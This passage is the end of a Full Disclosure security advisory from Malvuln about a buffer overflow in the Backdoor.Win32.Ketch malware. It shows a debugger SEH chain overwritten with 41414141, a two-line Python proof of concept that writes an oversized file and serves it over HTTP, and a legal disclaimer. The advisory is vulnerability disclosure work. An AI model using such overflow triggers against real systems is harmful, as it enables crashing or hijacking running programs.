001952e4: ntdll!ExecuteHandler2+44 (773e9d70)
00195894: ntdll!ExecuteHandler2+44 (773e9d70)
00195e44: ntdll!ExecuteHandler2+44 (773e9d70)
001963f4: ntdll!ExecuteHandler2+44 (773e9d70)
001969a4: ntdll!ExecuteHandler2+44 (773e9d70)
00196f54: ntdll!ExecuteHandler2+44 (773e9d70)
00197504: ntdll!ExecuteHandler2+44 (773e9d70)
00197ab4: ntdll!ExecuteHandler2+44 (773e9d70)
00198064: ntdll!ExecuteHandler2+44 (773e9d70)
00198614: ntdll!ExecuteHandler2+44 (773e9d70)
00198bc4: ntdll!ExecuteHandler2+44 (773e9d70)
00199174: ntdll!ExecuteHandler2+44 (773e9d70)
00199724: ntdll!ExecuteHandler2+44 (773e9d70)
00199cd4: ntdll!ExecuteHandler2+44 (773e9d70)
0019a284: ntdll!ExecuteHandler2+44 (773e9d70)
0019a834: ntdll!ExecuteHandler2+44 (773e9d70)
0019ade4: ntdll!ExecuteHandler2+44 (773e9d70)
0019b394: ntdll!ExecuteHandler2+44 (773e9d70)
0019b944: ntdll!ExecuteHandler2+44 (773e9d70)
0019bef4: ntdll!ExecuteHandler2+44 (773e9d70)
0019c4a4: ntdll!ExecuteHandler2+44 (773e9d70)
0019ca54: ntdll!ExecuteHandler2+44 (773e9d70)
0019d004: ntdll!ExecuteHandler2+44 (773e9d70)
0019d5b4: ntdll!ExecuteHandler2+44 (773e9d70)
0019db64: ntdll!ExecuteHandler2+44 (773e9d70)
0019e114: ntdll!ExecuteHandler2+44 (773e9d70)
0019e6c4: ntdll!ExecuteHandler2+44 (773e9d70)
0019ec74: ntdll!ExecuteHandler2+44 (773e9d70)
0019f224: ntdll!ExecuteHandler2+44 (773e9d70)
0019f80c: Backdoor_Win32_Ketch_a_1149c42fd8cf3ca7d00ef55a6337befe+34510
(00434510)
0019fe24: 41414141
Invalid exception stack at 41414141



Exploit/PoC:
python -c "print 'q'*1612" > script.dat
python -m SimpleHTTPServer 80


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or
otherwise. Permission is hereby granted for the redistribution of this
advisory, provided that it is not altered except by reformatting it,
and that due credit is given. Permission is explicitly given for
insertion in vulnerability databases and similar, provided that due
credit is given to the author. The author is not responsible for any
misuse of the information contained herein and accepts no
responsibility for any damage caused by the use or misuse of this
information. The author prohibits any malicious use of security
related information or exploits by the author or elsewhere. Do not
attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper
Malware handling or the downloading of ANY Malware mentioned on this
website or elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
